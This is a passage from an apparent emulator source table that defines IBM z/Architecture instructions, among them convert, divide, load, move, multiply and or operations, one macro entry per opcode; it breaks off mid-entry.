F(0xb39a, CFXBR, RRF_e, Z, x2h, x2l, new, r1_32, cfxb, 0, IF_BFP) F(0xb3a8, CGEBR, RRF_e, Z, 0, e2, r1, 0, cgeb, 0, IF_BFP) F(0xb3a9, CGDBR, RRF_e, Z, 0, f2, r1, 0, cgdb, 0, IF_BFP) F(0xb3aa, CGXBR, RRF_e, Z, x2h, x2l, r1, 0, cgxb, 0, IF_BFP) /* CONVERT FROM FIXED */ F(0xb394, CEFBR, RRF_e, Z, 0, r2_32s, new, e1, cegb, 0, IF_BFP) F(0xb395, CDFBR, RRF_e, Z, 0, r2_32s, new, f1, cdgb, 0, IF_BFP) F(0xb396, CXFBR, RRF_e, Z, 0, r2_32s, new_P, x1, cxgb, 0, IF_BFP) F(0xb3a4, CEGBR, RRF_e, Z, 0, r2_o, new, e1, cegb, 0, IF_BFP) F(0xb3a5, CDGBR, RRF_e, Z, 0, r2_o, new, f1, cdgb, 0, IF_BFP) F(0xb3a6, CXGBR, RRF_e, Z, 0, r2_o, new_P, x1, cxgb, 0, IF_BFP) /* CONVERT TO LOGICAL */ F(0xb39c, CLFEBR, RRF_e, FPE, 0, e2, new, r1_32, clfeb, 0, IF_BFP) F(0xb39d, CLFDBR, RRF_e, FPE, 0, f2, new, r1_32, clfdb, 0, IF_BFP) F(0xb39e, CLFXBR, RRF_e, FPE, x2h, x2l, new, r1_32, clfxb, 0, IF_BFP) F(0xb3ac, CLGEBR, RRF_e, FPE, 0, e2, r1, 0, clgeb, 0, IF_BFP) F(0xb3ad, CLGDBR, RRF_e, FPE, 0, f2, r1, 0, clgdb, 0, IF_BFP) F(0xb3ae, CLGXBR, RRF_e, FPE, x2h, x2l, r1, 0, clgxb, 0, IF_BFP) /* CONVERT FROM LOGICAL */ F(0xb390, CELFBR, RRF_e, FPE, 0, r2_32u, new, e1, celgb, 0, IF_BFP) F(0xb391, CDLFBR, RRF_e, FPE, 0, r2_32u, new, f1, cdlgb, 0, IF_BFP) F(0xb392, CXLFBR, RRF_e, FPE, 0, r2_32u, new_P, x1, cxlgb, 0, IF_BFP) F(0xb3a0, CELGBR, RRF_e, FPE, 0, r2_o, new, e1, celgb, 0, IF_BFP) F(0xb3a1, CDLGBR, RRF_e, FPE, 0, r2_o, new, f1, cdlgb, 0, IF_BFP) F(0xb3a2, CXLGBR, RRF_e, FPE, 0, r2_o, new_P, x1, cxlgb, 0, IF_BFP) /* CONVERT UTF-8 TO UTF-16 */ D(0xb2a7, CU12, RRF_c, Z, 0, 0, 0, 0, cuXX, 0, 12) /* CONVERT UTF-8 TO UTF-32 */ D(0xb9b0, CU14, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 14) /* CONVERT UTF-16 to UTF-8 */ D(0xb2a6, CU21, RRF_c, Z, 0, 0, 0, 0, cuXX, 0, 21) /* CONVERT UTF-16 to UTF-32 */ D(0xb9b1, CU24, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 24) /* CONVERT UTF-32 to UTF-8 */ D(0xb9b2, CU41, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 41) /* CONVERT UTF-32 to UTF-16 */ D(0xb9b3, CU42, RRF_c, ETF3, 0, 0, 0, 0, cuXX, 0, 42) /* DIVIDE */ C(0x1d00, DR, RR_a, Z, r1_D32, r2_32s, new_P, r1_P32, divs32, 0) C(0x5d00, D, RX_a, Z, r1_D32, m2_32s, new_P, r1_P32, divs32, 0) F(0xb30d, DEBR, RRE, Z, e1, e2, new, e1, deb, 0, IF_BFP) F(0xb31d, DDBR, RRE, Z, f1, f2, new, f1, ddb, 0, IF_BFP) F(0xb34d, DXBR, RRE, Z, x2h, x2l, x1, x1, dxb, 0, IF_BFP) F(0xed0d, DEB, RXE, Z, e1, m2_32u, new, e1, deb, 0, IF_BFP) F(0xed1d, DDB, RXE, Z, f1, m2_64, new, f1, ddb, 0, IF_BFP) /* DIVIDE LOGICAL */ C(0xb997, DLR, RRE, Z, r1_D32, r2_32u, new_P, r1_P32, divu32, 0) C(0xe397, DL, RXY_a, Z, r1_D32, m2_32u, new_P, r1_P32, divu32, 0) C(0xb987, DLGR, RRE, Z, 0, r2_o, r1_P, 0, divu64, 0) C(0xe387, DLG, RXY_a, Z, 0, m2_64, r1_P, 0, divu64, 0) /* DIVIDE SINGLE */ C(0xb90d, DSGR, RRE, Z, r1p1, r2, r1_P, 0, divs64, 0) C(0xb91d, DSGFR, RRE, Z, r1p1, r2_32s, r1_P, 0, divs64, 0) C(0xe30d, DSG, RXY_a, Z, r1p1, m2_64, r1_P, 0, divs64, 0) C(0xe31d, DSGF, RXY_a, Z, r1p1, m2_32s, r1_P, 0, divs64, 0) /* EXCLUSIVE OR */ C(0x1700, XR, RR_a, Z, r1, r2, new, r1_32, xor, nz32) C(0xb9f7, XRK, RRF_a, DO, r2, r3, new, r1_32, xor, nz32) C(0x5700, X, RX_a, Z, r1, m2_32s, new, r1_32, xor, nz32) C(0xe357, XY, RXY_a, LD, r1, m2_32s, new, r1_32, xor, nz32) C(0xb982, XGR, RRE, Z, r1, r2, r1, 0, xor, nz64) C(0xb9e7, XGRK, RRF_a, DO, r2, r3, r1, 0, xor, nz64) C(0xe382, XG, RXY_a, Z, r1, m2_64, r1, 0, xor, nz64) C(0xd700, XC, SS_a, Z, 0, 0, 0, 0, xc, 0) /* EXCLUSIVE OR IMMEDIATE */ D(0xc006, XIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, xori, 0, 0x2020) D(0xc007, XILF, RIL_a, EI, r1_o, i2_32u, r1, 0, xori, 0, 0x2000) D(0x9700, XI, SI, Z, la1, i2_8u, new, 0, xi, nz64, MO_UB) D(0xeb57, XIY, SIY, LD, la1, i2_8u, new, 0, xi, nz64, MO_UB) /* EXECUTE */ C(0x4400, EX, RX_a, Z, 0, a2, 0, 0, ex, 0) /* EXECUTE RELATIVE LONG */ C(0xc600, EXRL, RIL_b, EE, 0, ri2, 0, 0, ex, 0) /* EXTRACT ACCESS */ C(0xb24f, EAR, RRE, Z, 0, 0, new, r1_32, ear, 0) /* EXTRACT CPU ATTRIBUTE */ C(0xeb4c, ECAG, RSY_a, GIE, 0, a2, r1, 0, ecag, 0) /* EXTRACT CPU TIME */ C(0xc801, ECTG, SSF, ECT, 0, 0, 0, 0, ectg, 0) /* EXTRACT FPC */ F(0xb38c, EFPC, RRE, Z, 0, 0, new, r1_32, efpc, 0, IF_BFP) /* EXTRACT PSW */ C(0xb98d, EPSW, RRE, Z, 0, 0, 0, 0, epsw, 0) /* FIND LEFTMOST ONE */ C(0xb983, FLOGR, RRE, EI, 0, r2_o, r1_P, 0, flogr, 0) /* INSERT CHARACTER */ C(0x4300, IC, RX_a, Z, 0, m2_8u, 0, r1_8, mov2, 0) C(0xe373, ICY, RXY_a, LD, 0, m2_8u, 0, r1_8, mov2, 0) /* INSERT CHARACTERS UNDER MASK */ D(0xbf00, ICM, RS_b, Z, 0, a2, r1, 0, icm, 0, 0) D(0xeb81, ICMY, RSY_b, LD, 0, a2, r1, 0, icm, 0, 0) D(0xeb80, ICMH, RSY_b, Z, 0, a2, r1, 0, icm, 0, 32) /* INSERT IMMEDIATE */ D(0xc008, IIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, insi, 0, 0x2020) D(0xc009, IILF, RIL_a, EI, r1_o, i2_32u, r1, 0, insi, 0, 0x2000) D(0xa500, IIHH, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1030) D(0xa501, IIHL, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1020) D(0xa502, IILH, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1010) D(0xa503, IILL, RI_a, Z, r1_o, i2_16u, r1, 0, insi, 0, 0x1000) /* INSERT PROGRAM MASK */ C(0xb222, IPM, RRE, Z, 0, 0, r1, 0, ipm, 0) /* LOAD */ C(0x1800, LR, RR_a, Z, 0, r2_o, 0, cond_r1r2_32, mov2, 0) C(0x5800, L, RX_a, Z, 0, a2, new, r1_32, ld32s, 0) C(0xe358, LY, RXY_a, LD, 0, a2, new, r1_32, ld32s, 0) C(0xb904, LGR, RRE, Z, 0, r2_o, 0, r1, mov2, 0) C(0xb914, LGFR, RRE, Z, 0, r2_32s, 0, r1, mov2, 0) C(0xe304, LG, RXY_a, Z, 0, a2, r1, 0, ld64, 0) C(0xe314, LGF, RXY_a, Z, 0, a2, r1, 0, ld32s, 0) F(0x2800, LDR, RR_a, Z, 0, f2, 0, f1, mov2, 0, IF_AFP1 | IF_AFP2) F(0x6800, LD, RX_a, Z, 0, m2_64, 0, f1, mov2, 0, IF_AFP1) F(0xed65, LDY, RXY_a, LD, 0, m2_64, 0, f1, mov2, 0, IF_AFP1) F(0x3800, LER, RR_a, Z, 0, e2, 0, cond_e1e2, mov2, 0, IF_AFP1 | IF_AFP2) F(0x7800, LE, RX_a, Z, 0, m2_32u, 0, e1, mov2, 0, IF_AFP1) F(0xed64, LEY, RXY_a, LD, 0, m2_32u, 0, e1, mov2, 0, IF_AFP1) F(0xb365, LXR, RRE, Z, x2h, x2l, 0, x1, movx, 0, IF_AFP1) /* LOAD IMMEDIATE */ C(0xc001, LGFI, RIL_a, EI, 0, i2, 0, r1, mov2, 0) /* LOAD RELATIVE LONG */ C(0xc40d, LRL, RIL_b, GIE, 0, ri2, new, r1_32, ld32s, 0) C(0xc408, LGRL, RIL_b, GIE, 0, ri2, r1, 0, ld64, 0) C(0xc40c, LGFRL, RIL_b, GIE, 0, ri2, r1, 0, ld32s, 0) /* LOAD ADDRESS */ C(0x4100, LA, RX_a, Z, 0, a2, 0, r1, mov2, 0) C(0xe371, LAY, RXY_a, LD, 0, a2, 0, r1, mov2, 0) /* LOAD ADDRESS EXTENDED */ C(0x5100, LAE, RX_a, Z, 0, a2, 0, r1, mov2e, 0) C(0xe375, LAEY, RXY_a, GIE, 0, a2, 0, r1, mov2e, 0) /* LOAD ADDRESS RELATIVE LONG */ C(0xc000, LARL, RIL_b, Z, 0, ri2, 0, r1, mov2, 0) /* LOAD AND ADD */ D(0xebf8, LAA, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, laa, adds32, MO_TESL) D(0xebe8, LAAG, RSY_a, ILA, r3, a2, new, in2_r1, laa, adds64, MO_TEQ) /* LOAD AND ADD LOGICAL */ D(0xebfa, LAAL, RSY_a, ILA, r3_32u, a2, new, in2_r1_32, laa, addu32, MO_TEUL) D(0xebea, LAALG, RSY_a, ILA, r3, a2, new, in2_r1, laa, addu64, MO_TEQ) /* LOAD AND AND */ D(0xebf4, LAN, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, lan, nz32, MO_TESL) D(0xebe4, LANG, RSY_a, ILA, r3, a2, new, in2_r1, lan, nz64, MO_TEQ) /* LOAD AND EXCLUSIVE OR */ D(0xebf7, LAX, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, lax, nz32, MO_TESL) D(0xebe7, LAXG, RSY_a, ILA, r3, a2, new, in2_r1, lax, nz64, MO_TEQ) /* LOAD AND OR */ D(0xebf6, LAO, RSY_a, ILA, r3_32s, a2, new, in2_r1_32, lao, nz32, MO_TESL) D(0xebe6, LAOG, RSY_a, ILA, r3, a2, new, in2_r1, lao, nz64, MO_TEQ) /* LOAD AND TEST */ C(0x1200, LTR, RR_a, Z, 0, r2_o, 0, cond_r1r2_32, mov2, s32) C(0xb902, LTGR, RRE, Z, 0, r2_o, 0, r1, mov2, s64) C(0xb912, LTGFR, RRE, Z, 0, r2_32s, 0, r1, mov2, s64) C(0xe312, LT, RXY_a, EI, 0, a2, new, r1_32, ld32s, s64) C(0xe302, LTG, RXY_a, EI, 0, a2, r1, 0, ld64, s64) C(0xe332, LTGF, RXY_a, GIE, 0, a2, r1, 0, ld32s, s64) F(0xb302, LTEBR, RRE, Z, 0, e2, 0, cond_e1e2, mov2, f32, IF_BFP) F(0xb312, LTDBR, RRE, Z, 0, f2, 0, f1, mov2, f64, IF_BFP) F(0xb342, LTXBR, RRE, Z, x2h, x2l, 0, x1, movx, f128, IF_BFP) /* LOAD AND TRAP */ C(0xe39f, LAT, RXY_a, LAT, 0, m2_32u, r1, 0, lat, 0) C(0xe385, LGAT, RXY_a, LAT, 0, a2, r1, 0, lgat, 0) /* LOAD AND ZERO RIGHTMOST BYTE */ C(0xe3eb, LZRF, RXY_a, LZRB, 0, m2_32u, new, r1_32, lzrb, 0) C(0xe32a, LZRG, RXY_a, LZRB, 0, m2_64, r1, 0, lzrb, 0) /* LOAD LOGICAL AND ZERO RIGHTMOST BYTE */ C(0xe33a, LLZRGF, RXY_a, LZRB, 0, m2_32u, r1, 0, lzrb, 0) /* LOAD BYTE */ C(0xb926, LBR, RRE, EI, 0, r2_8s, 0, r1_32, mov2, 0) C(0xb906, LGBR, RRE, EI, 0, r2_8s, 0, r1, mov2, 0) C(0xe376, LB, RXY_a, LD, 0, a2, new, r1_32, ld8s, 0) C(0xe377, LGB, RXY_a, LD, 0, a2, r1, 0, ld8s, 0) /* LOAD BYTE HIGH */ C(0xe3c0, LBH, RXY_a, HW, 0, a2, new, r1_32h, ld8s, 0) /* LOAD COMPLEMENT */ C(0x1300, LCR, RR_a, Z, 0, r2, new, r1_32, neg, neg32) C(0xb903, LCGR, RRE, Z, 0, r2, r1, 0, neg, neg64) C(0xb913, LCGFR, RRE, Z, 0, r2_32s, r1, 0, neg, neg64) F(0xb303, LCEBR, RRE, Z, 0, e2, new, e1, negf32, f32, IF_BFP) F(0xb313, LCDBR, RRE, Z, 0, f2, new, f1, negf64, f64, IF_BFP) F(0xb343, LCXBR, RRE, Z, x2h, x2l, new_P, x1, negf128, f128, IF_BFP) F(0xb373, LCDFR, RRE, FPSSH, 0, f2, new, f1, negf64, 0, IF_AFP1 | IF_AFP2) /* LOAD COUNT TO BLOCK BOUNDARY */ C(0xe727, LCBB, RXE, V, la2, 0, r1, 0, lcbb, 0) /* LOAD HALFWORD */ C(0xb927, LHR, RRE, EI, 0, r2_16s, 0, r1_32, mov2, 0) C(0xb907, LGHR, RRE, EI, 0, r2_16s, 0, r1, mov2, 0) C(0x4800, LH, RX_a, Z, 0, a2, new, r1_32, ld16s, 0) C(0xe378, LHY, RXY_a, LD, 0, a2, new, r1_32, ld16s, 0) C(0xe315, LGH, RXY_a, Z, 0, a2, r1, 0, ld16s, 0) /* LOAD HALFWORD HIGH */ C(0xe3c4, LHH, RXY_a, HW, 0, a2, new, r1_32h, ld16s, 0) /* LOAD HALFWORD IMMEDIATE */ C(0xa708, LHI, RI_a, Z, 0, i2, 0, r1_32, mov2, 0) C(0xa709, LGHI, RI_a, Z, 0, i2, 0, r1, mov2, 0) /* LOAD HALFWORD RELATIVE LONG */ C(0xc405, LHRL, RIL_b, GIE, 0, ri2, new, r1_32, ld16s, 0) C(0xc404, LGHRL, RIL_b, GIE, 0, ri2, r1, 0, ld16s, 0) /* LOAD HIGH */ C(0xe3ca, LFH, RXY_a, HW, 0, a2, new, r1_32h, ld32u, 0) /* LOAG HIGH AND TRAP */ C(0xe3c8, LFHAT, RXY_a, LAT, 0, m2_32u, r1, 0, lfhat, 0) /* LOAD LOGICAL */ C(0xb916, LLGFR, RRE, Z, 0, r2_32u, 0, r1, mov2, 0) C(0xe316, LLGF, RXY_a, Z, 0, a2, r1, 0, ld32u, 0) /* LOAD LOGICAL AND TRAP */ C(0xe39d, LLGFAT, RXY_a, LAT, 0, a2, r1, 0, llgfat, 0) /* LOAD LOGICAL RELATIVE LONG */ C(0xc40e, LLGFRL, RIL_b, GIE, 0, ri2, r1, 0, ld32u, 0) /* LOAD LOGICAL CHARACTER */ C(0xb994, LLCR, RRE, EI, 0, r2_8u, 0, r1_32, mov2, 0) C(0xb984, LLGCR, RRE, EI, 0, r2_8u, 0, r1, mov2, 0) C(0xe394, LLC, RXY_a, EI, 0, a2, new, r1_32, ld8u, 0) C(0xe390, LLGC, RXY_a, Z, 0, a2, r1, 0, ld8u, 0) /* LOAD LOGICAL CHARACTER HIGH */ C(0xe3c2, LLCH, RXY_a, HW, 0, a2, new, r1_32h, ld8u, 0) /* LOAD LOGICAL HALFWORD */ C(0xb995, LLHR, RRE, EI, 0, r2_16u, 0, r1_32, mov2, 0) C(0xb985, LLGHR, RRE, EI, 0, r2_16u, 0, r1, mov2, 0) C(0xe395, LLH, RXY_a, EI, 0, a2, new, r1_32, ld16u, 0) C(0xe391, LLGH, RXY_a, Z, 0, a2, r1, 0, ld16u, 0) /* LOAD LOGICAL HALFWORD HIGH */ C(0xe3c6, LLHH, RXY_a, HW, 0, a2, new, r1_32h, ld16u, 0) /* LOAD LOGICAL HALFWORD RELATIVE LONG */ C(0xc402, LLHRL, RIL_b, GIE, 0, ri2, new, r1_32, ld16u, 0) C(0xc406, LLGHRL, RIL_b, GIE, 0, ri2, r1, 0, ld16u, 0) /* LOAD LOGICAL IMMEDATE */ D(0xc00e, LLIHF, RIL_a, EI, 0, i2_32u_shl, 0, r1, mov2, 0, 32) D(0xc00f, LLILF, RIL_a, EI, 0, i2_32u_shl, 0, r1, mov2, 0, 0) D(0xa50c, LLIHH, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 48) D(0xa50d, LLIHL, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 32) D(0xa50e, LLILH, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 16) D(0xa50f, LLILL, RI_a, Z, 0, i2_16u_shl, 0, r1, mov2, 0, 0) /* LOAD LOGICAL THIRTY ONE BITS */ C(0xb917, LLGTR, RRE, Z, 0, r2_o, r1, 0, llgt, 0) C(0xe317, LLGT, RXY_a, Z, 0, m2_32u, r1, 0, llgt, 0) /* LOAD LOGICAL THIRTY ONE BITS AND TRAP */ C(0xe39c, LLGTAT, RXY_a, LAT, 0, m2_32u, r1, 0, llgtat, 0) /* LOAD FPR FROM GR */ F(0xb3c1, LDGR, RRE, FPRGR, 0, r2_o, 0, f1, mov2, 0, IF_AFP1) /* LOAD GR FROM FPR */ F(0xb3cd, LGDR, RRE, FPRGR, 0, f2, 0, r1, mov2, 0, IF_AFP2) /* LOAD NEGATIVE */ C(0x1100, LNR, RR_a, Z, 0, r2_32s, new, r1_32, nabs, nabs32) C(0xb901, LNGR, RRE, Z, 0, r2, r1, 0, nabs, nabs64) C(0xb911, LNGFR, RRE, Z, 0, r2_32s, r1, 0, nabs, nabs64) F(0xb301, LNEBR, RRE, Z, 0, e2, new, e1, nabsf32, f32, IF_BFP) F(0xb311, LNDBR, RRE, Z, 0, f2, new, f1, nabsf64, f64, IF_BFP) F(0xb341, LNXBR, RRE, Z, x2h, x2l, new_P, x1, nabsf128, f128, IF_BFP) F(0xb371, LNDFR, RRE, FPSSH, 0, f2, new, f1, nabsf64, 0, IF_AFP1 | IF_AFP2) /* LOAD ON CONDITION */ C(0xb9f2, LOCR, RRF_c, LOC, r1, r2, new, r1_32, loc, 0) C(0xb9e2, LOCGR, RRF_c, LOC, r1, r2, r1, 0, loc, 0) C(0xebf2, LOC, RSY_b, LOC, r1, m2_32u, new, r1_32, loc, 0) C(0xebe2, LOCG, RSY_b, LOC, r1, m2_64, r1, 0, loc, 0) /* LOAD HALFWORD IMMEDIATE ON CONDITION */ C(0xec42, LOCHI, RIE_g, LOC2, r1, i2, new, r1_32, loc, 0) C(0xec46, LOCGHI, RIE_g, LOC2, r1, i2, r1, 0, loc, 0) C(0xec4e, LOCHHI, RIE_g, LOC2, r1_sr32, i2, new, r1_32h, loc, 0) /* LOAD HIGH ON CONDITION */ C(0xb9e0, LOCFHR, RRF_c, LOC2, r1_sr32, r2, new, r1_32h, loc, 0) C(0xebe0, LOCFH, RSY_b, LOC2, r1_sr32, m2_32u, new, r1_32h, loc, 0) /* LOAD PAIR DISJOINT */ D(0xc804, LPD, SSF, ILA, 0, 0, new_P, r3_P32, lpd, 0, MO_TEUL) D(0xc805, LPDG, SSF, ILA, 0, 0, new_P, r3_P64, lpd, 0, MO_TEQ) /* LOAD PAIR FROM QUADWORD */ C(0xe38f, LPQ, RXY_a, Z, 0, a2, r1_P, 0, lpq, 0) /* LOAD POSITIVE */ C(0x1000, LPR, RR_a, Z, 0, r2_32s, new, r1_32, abs, abs32) C(0xb900, LPGR, RRE, Z, 0, r2, r1, 0, abs, abs64) C(0xb910, LPGFR, RRE, Z, 0, r2_32s, r1, 0, abs, abs64) F(0xb300, LPEBR, RRE, Z, 0, e2, new, e1, absf32, f32, IF_BFP) F(0xb310, LPDBR, RRE, Z, 0, f2, new, f1, absf64, f64, IF_BFP) F(0xb340, LPXBR, RRE, Z, x2h, x2l, new_P, x1, absf128, f128, IF_BFP) F(0xb370, LPDFR, RRE, FPSSH, 0, f2, new, f1, absf64, 0, IF_AFP1 | IF_AFP2) /* LOAD REVERSED */ C(0xb91f, LRVR, RRE, Z, 0, r2_32u, new, r1_32, rev32, 0) C(0xb90f, LRVGR, RRE, Z, 0, r2_o, r1, 0, rev64, 0) C(0xe31f, LRVH, RXY_a, Z, 0, m2_16u, new, r1_16, rev16, 0) C(0xe31e, LRV, RXY_a, Z, 0, m2_32u, new, r1_32, rev32, 0) C(0xe30f, LRVG, RXY_a, Z, 0, m2_64, r1, 0, rev64, 0) /* LOAD ZERO */ F(0xb374, LZER, RRE, Z, 0, 0, 0, e1, zero, 0, IF_AFP1) F(0xb375, LZDR, RRE, Z, 0, 0, 0, f1, zero, 0, IF_AFP1) F(0xb376, LZXR, RRE, Z, 0, 0, 0, x1, zero2, 0, IF_AFP1) /* LOAD FPC */ F(0xb29d, LFPC, S, Z, 0, m2_32u, 0, 0, sfpc, 0, IF_BFP) /* LOAD FPC AND SIGNAL */ F(0xb2bd, LFAS, S, IEEEE_SIM, 0, m2_32u, 0, 0, sfas, 0, IF_DFP) /* LOAD FP INTEGER */ F(0xb357, FIEBR, RRF_e, Z, 0, e2, new, e1, fieb, 0, IF_BFP) F(0xb35f, FIDBR, RRF_e, Z, 0, f2, new, f1, fidb, 0, IF_BFP) F(0xb347, FIXBR, RRF_e, Z, x2h, x2l, new_P, x1, fixb, 0, IF_BFP) /* LOAD LENGTHENED */ F(0xb304, LDEBR, RRE, Z, 0, e2, new, f1, ldeb, 0, IF_BFP) F(0xb305, LXDBR, RRE, Z, 0, f2, new_P, x1, lxdb, 0, IF_BFP) F(0xb306, LXEBR, RRE, Z, 0, e2, new_P, x1, lxeb, 0, IF_BFP) F(0xed04, LDEB, RXE, Z, 0, m2_32u, new, f1, ldeb, 0, IF_BFP) F(0xed05, LXDB, RXE, Z, 0, m2_64, new_P, x1, lxdb, 0, IF_BFP) F(0xed06, LXEB, RXE, Z, 0, m2_32u, new_P, x1, lxeb, 0, IF_BFP) F(0xb324, LDER, RXE, Z, 0, e2, new, f1, lde, 0, IF_AFP1) F(0xed24, LDE, RXE, Z, 0, m2_32u, new, f1, lde, 0, IF_AFP1) /* LOAD ROUNDED */ F(0xb344, LEDBR, RRF_e, Z, 0, f2, new, e1, ledb, 0, IF_BFP) F(0xb345, LDXBR, RRF_e, Z, x2h, x2l, new, f1, ldxb, 0, IF_BFP) F(0xb346, LEXBR, RRF_e, Z, x2h, x2l, new, e1, lexb, 0, IF_BFP) /* LOAD MULTIPLE */ C(0x9800, LM, RS_a, Z, 0, a2, 0, 0, lm32, 0) C(0xeb98, LMY, RSY_a, LD, 0, a2, 0, 0, lm32, 0) C(0xeb04, LMG, RSY_a, Z, 0, a2, 0, 0, lm64, 0) /* LOAD MULTIPLE HIGH */ C(0xeb96, LMH, RSY_a, Z, 0, a2, 0, 0, lmh, 0) /* LOAD ACCESS MULTIPLE */ C(0x9a00, LAM, RS_a, Z, 0, a2, 0, 0, lam, 0) C(0xeb9a, LAMY, RSY_a, LD, 0, a2, 0, 0, lam, 0) /* MOVE */ C(0xd200, MVC, SS_a, Z, la1, a2, 0, 0, mvc, 0) C(0xe544, MVHHI, SIL, GIE, la1, i2, 0, m1_16, mov2, 0) C(0xe54c, MVHI, SIL, GIE, la1, i2, 0, m1_32, mov2, 0) C(0xe548, MVGHI, SIL, GIE, la1, i2, 0, m1_64, mov2, 0) C(0x9200, MVI, SI, Z, la1, i2, 0, m1_8, mov2, 0) C(0xeb52, MVIY, SIY, LD, la1, i2, 0, m1_8, mov2, 0) /* MOVE INVERSE */ C(0xe800, MVCIN, SS_a, Z, la1, a2, 0, 0, mvcin, 0) /* MOVE LONG */ C(0x0e00, MVCL, RR_a, Z, 0, 0, 0, 0, mvcl, 0) /* MOVE LONG EXTENDED */ C(0xa800, MVCLE, RS_a, Z, 0, a2, 0, 0, mvcle, 0) /* MOVE LONG UNICODE */ C(0xeb8e, MVCLU, RSY_a, E2, 0, a2, 0, 0, mvclu, 0) /* MOVE NUMERICS */ C(0xd100, MVN, SS_a, Z, la1, a2, 0, 0, mvn, 0) /* MOVE PAGE */ C(0xb254, MVPG, RRE, Z, r1_o, r2_o, 0, 0, mvpg, 0) /* MOVE STRING */ C(0xb255, MVST, RRE, Z, 0, 0, 0, 0, mvst, 0) /* MOVE WITH OPTIONAL SPECIFICATION */ C(0xc800, MVCOS, SSF, MVCOS, la1, a2, 0, 0, mvcos, 0) /* MOVE WITH OFFSET */ /* Really format SS_b, but we pack both lengths into one argument for the helper call, so we might as well leave one 8-bit field. */ C(0xf100, MVO, SS_a, Z, la1, a2, 0, 0, mvo, 0) /* MOVE ZONES */ C(0xd300, MVZ, SS_a, Z, la1, a2, 0, 0, mvz, 0) /* MULTIPLY */ C(0x1c00, MR, RR_a, Z, r1p1_32s, r2_32s, new, r1_D32, mul, 0) C(0x5c00, M, RX_a, Z, r1p1_32s, m2_32s, new, r1_D32, mul, 0) C(0xe35c, MFY, RXY_a, GIE, r1p1_32s, m2_32s, new, r1_D32, mul, 0) F(0xb317, MEEBR, RRE, Z, e1, e2, new, e1, meeb, 0, IF_BFP) F(0xb31c, MDBR, RRE, Z, f1, f2, new, f1, mdb, 0, IF_BFP) F(0xb34c, MXBR, RRE, Z, x2h, x2l, x1, x1, mxb, 0, IF_BFP) F(0xb30c, MDEBR, RRE, Z, f1, e2, new, f1, mdeb, 0, IF_BFP) F(0xb307, MXDBR, RRE, Z, 0, f2, x1, x1, mxdb, 0, IF_BFP) F(0xed17, MEEB, RXE, Z, e1, m2_32u, new, e1, meeb, 0, IF_BFP) F(0xed1c, MDB, RXE, Z, f1, m2_64, new, f1, mdb, 0, IF_BFP) F(0xed0c, MDEB, RXE, Z, f1, m2_32u, new, f1, mdeb, 0, IF_BFP) F(0xed07, MXDB, RXE, Z, 0, m2_64, x1, x1, mxdb, 0, IF_BFP) /* MULTIPLY HALFWORD */ C(0x4c00, MH, RX_a, Z, r1_o, m2_16s, new, r1_32, mul, 0) C(0xe37c, MHY, RXY_a, GIE, r1_o, m2_16s, new, r1_32, mul, 0) /* MULTIPLY HALFWORD IMMEDIATE */ C(0xa70c, MHI, RI_a, Z, r1_o, i2, new, r1_32, mul, 0) C(0xa70d, MGHI, RI_a, Z, r1_o, i2, r1, 0, mul, 0) /* MULTIPLY LOGICAL */ C(0xb996, MLR, RRE, Z, r1p1_32u, r2_32u, new, r1_D32, mul, 0) C(0xe396, ML, RXY_a, Z, r1p1_32u, m2_32u, new, r1_D32, mul, 0) C(0xb986, MLGR, RRE, Z, r1p1, r2_o, r1_P, 0, mul128, 0) C(0xe386, MLG, RXY_a, Z, r1p1, m2_64, r1_P, 0, mul128, 0) /* MULTIPLY SINGLE */ C(0xb252, MSR, RRE, Z, r1_o, r2_o, new, r1_32, mul, 0) C(0x7100, MS, RX_a, Z, r1_o, m2_32s, new, r1_32, mul, 0) C(0xe351, MSY, RXY_a, LD, r1_o, m2_32s, new, r1_32, mul, 0) C(0xb90c, MSGR, RRE, Z, r1_o, r2_o, r1, 0, mul, 0) C(0xb91c, MSGFR, RRE, Z, r1_o, r2_32s, r1, 0, mul, 0) C(0xe30c, MSG, RXY_a, Z, r1_o, m2_64, r1, 0, mul, 0) C(0xe31c, MSGF, RXY_a, Z, r1_o, m2_32s, r1, 0, mul, 0) /* MULTIPLY SINGLE IMMEDIATE */ C(0xc201, MSFI, RIL_a, GIE, r1_o, i2, new, r1_32, mul, 0) C(0xc200, MSGFI, RIL_a, GIE, r1_o, i2, r1, 0, mul, 0) /* MULTIPLY AND ADD */ F(0xb30e, MAEBR, RRD, Z, e1, e2, new, e1, maeb, 0, IF_BFP) F(0xb31e, MADBR, RRD, Z, f1, f2, new, f1, madb, 0, IF_BFP) F(0xed0e, MAEB, RXF, Z, e1, m2_32u, new, e1, maeb, 0, IF_BFP) F(0xed1e, MADB, RXF, Z, f1, m2_64, new, f1, madb, 0, IF_BFP) /* MULTIPLY AND SUBTRACT */ F(0xb30f, MSEBR, RRD, Z, e1, e2, new, e1, mseb, 0, IF_BFP) F(0xb31f, MSDBR, RRD, Z, f1, f2, new, f1, msdb, 0, IF_BFP) F(0xed0f, MSEB, RXF, Z, e1, m2_32u, new, e1, mseb, 0, IF_BFP) F(0xed1f, MSDB, RXF, Z, f1, m2_64, new, f1, msdb, 0, IF_BFP) /* OR */ C(0x1600, OR, RR_a, Z, r1, r2, new, r1_32, or, nz32) C(0xb9f6, ORK, RRF_a, DO, r2, r3, new, r1_32, or, nz32) C(0x5600, O, RX_a, Z, r1, m2_32s, new, r1_32, or, nz32) C(0xe356, OY, RXY_a, LD, r1, m2_32s, new, r1_32, or, nz32) C(0xb981, OGR, RRE, Z, r1, r2, r1, 0, or, nz64) C(0xb9e6, OGRK, RRF_a, DO, r2, r3, r1, 0, or, nz64) C(0xe381, OG, RXY_a, Z, r1, m2_64, r1, 0, or, nz64) C(0xd600, OC, SS_a, Z, la1, a2, 0, 0, oc, 0) /* OR IMMEDIATE */ D(0xc00c, 